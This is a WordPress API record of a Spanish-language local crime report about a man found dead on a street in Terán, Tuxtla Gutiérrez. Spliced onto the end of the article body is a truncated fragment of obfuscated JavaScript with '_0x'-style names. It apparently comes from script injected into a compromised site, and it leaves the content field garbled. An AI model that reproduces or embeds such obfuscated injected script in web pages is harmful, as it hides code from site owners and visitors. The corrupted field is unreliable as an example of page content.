{"id":21133,"date":"2025-03-28T04:59:44","date_gmt":"2025-03-28T04:59:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21133"},"modified":"2025-03-28T05:00:47","modified_gmt":"2025-03-28T05:00:47","slug":"hombre-pierde-la-v1d4-en-calles-de-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21133","title":{"rendered":"Hombre pierde la v1d4 en calles de Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"21134\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0035-1024x768.jpg\" alt=\"\" class=\"wp-image-21134\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0035-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0035-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0035-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0035.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este jueves por la noche un integrante del escuadr\u00f3n de la muerte perdi\u00f3 la vida en calles de Ter\u00e1n en la zona Poniente de Tuxtla.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que este hecho ocurri\u00f3 cuando los mismos vecinos de la 3a Norte, entre 5a y 6a Poniente reportaron a los n\u00fameros de emergencias que hab\u00eda un sujeto tirado en la v\u00eda p\u00fablica y no se mov\u00eda.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de diferentes corporaciones y localizaron al sujeto que vest\u00eda pantal\u00f3n de mezclilla azul, zapatos negros y sudadera del mismo color de unos 40 a\u00f1os de edad el cual estaba abajo de un \u00e1rbol a un costado de un Oxxo.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que el sujetos deambulaba por la zona e inger\u00eda bebidas alcoh\u00f3licas.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado Realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 27 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Este jueves por la noche un integrante del escuadr\u00f3n de la muerte perdi\u00f3 la vida en calles de Ter\u00e1n en la zona Poniente de Tuxtla. Los reportes oficiales informaron que este hecho ocurri\u00f3 cuando los mismos vecinos de la 3a Norte, entre 5a y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21135,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21133","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21133","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21133"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21133\/revisions"}],"predecessor-version":[{"id":21136,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21133\/revisions\/21136"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21135"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21133"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21133"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}